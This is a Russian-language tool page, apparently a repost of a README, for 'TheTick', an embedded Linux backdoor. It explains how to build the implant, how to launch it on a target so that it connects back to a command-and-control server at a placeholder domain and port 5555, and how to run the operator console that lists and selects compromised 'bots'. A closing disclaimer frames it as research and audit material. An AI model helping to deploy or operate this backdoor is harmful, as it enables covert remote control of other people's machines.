Простой встроенный бэкдор Linux.
Сборка
TheTick зависит только от libcurl, поэтому убедитесь, что у вас есть соответствующий пакет разработки.
Например, в дистрибутивах на основе Debian вы должны сделать следующее:
sudo apt-get install libcurl-dev
cd src
make clean
make
Установка
Получение стойкости бэкдора будет сильно зависеть от целевой платформы, и поэтому здесь это не задокументировано.
На целевом компьютере запустите бинарный файл со следующими аргументами:
./ticksvc ADDR PORT
Где «ADDR» и «PORT» должны быть заменены IP-адресом и портом, которые будут слушать команды и консоль.
Порт по умолчанию – 5555.
Консоль управления и команд не требует установки, но может иметь неразрешенные зависимости.
Выполните следующую команду, чтобы убедиться, что все зависимости установлены правильно (обратите внимание, что для этого не требуется sudo):
pip install --upgrade -r requirements.txt
В большинстве сред рабочего стола Linux следующий файл «Tick.desktop» создаст значок, который вы можете дважды щелкнуть для запуска консоли:
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
Использование
Чтобы запустить двоичный файл бэкдора на целевой платформе, задайте имя хоста и порт сервера управления в качестве параметров командной строки.
Например:
./ticksvc control.example-domain.com 5555
sudo apt-get install screen screen -S thetick ./thetick.py
screen -r thetick
Консоль сообщит вам, когда к ней подключится новый бот.
Используйте команду «bots», чтобы показать подключенных в данный момент ботов, а команда «use» выберет бота для работы.
Команда «help» показывает руководство пользователя.
Вот несколько скриншотов, иллюстрирующих возможности консоли:
Скачать TheTick
¯\_(ツ)_/¯
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.